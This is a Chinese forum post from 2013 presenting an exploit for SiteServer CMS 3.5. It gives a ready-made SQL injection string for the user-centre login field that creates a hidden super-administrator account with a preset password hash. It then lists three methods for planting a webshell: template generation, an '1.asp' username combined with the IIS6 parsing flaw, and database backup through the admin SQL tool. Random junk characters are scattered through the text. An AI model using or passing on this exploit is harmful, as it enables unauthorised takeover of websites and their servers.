经测试秒杀最新的3.5版2 E6 T! X- _8 n, ^3 @
stieserver官网:www.siteserver.cn3 q: n" Z: e- C. F3 f( p& Z/ x
EXP:+ A; _1 K: c' @# ?; T* j# J [
直接访问UserCenter/login.aspx
- H! g, c1 J& O用户名处输入:: g8 H4 k g E0 o/ t" u
: L# R3 p. O4 |( M123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–& Z/ H% f% ?. ]
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。3 @+ i! N( F5 D/ O ^- R
之后再访问后台SiteServer/login.aspx用插入的用户登陆8 l1 S$ p9 p6 L* c, E* @& |
后台拿webshell的三种方法:
z/ {; F4 n- {$ j( D一、9 Z! \& Z: p4 c
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx! `% L4 G; r9 h; q2 k
二、5 j2 b! W1 k2 k- ?/ S$ m1 m
成员权限-》添加用户-》用户名为:1.asp
# ^/ Q8 q( d' E9 W% phttp://127.0.0.1/usercenter/: h5 s- [4 h- [
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
8 G j& Y8 M1 L" i" Y(ps:后台添加用户时不会验证是否含有非法字符)- K1 P) t6 F# o& V; |/ p* E" E
三、( `* J- {+ R- V! A# v. k
系统工具-》实用工具-》机器参数查看8 u( `! w: w/ T) M( I6 k
可以看到数据库类型、名称,WEB路径7 q5 r4 g1 \ z
系统工具-》数据库工具-》SQL语句查询. T. G/ }) a( S5 K+ P
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对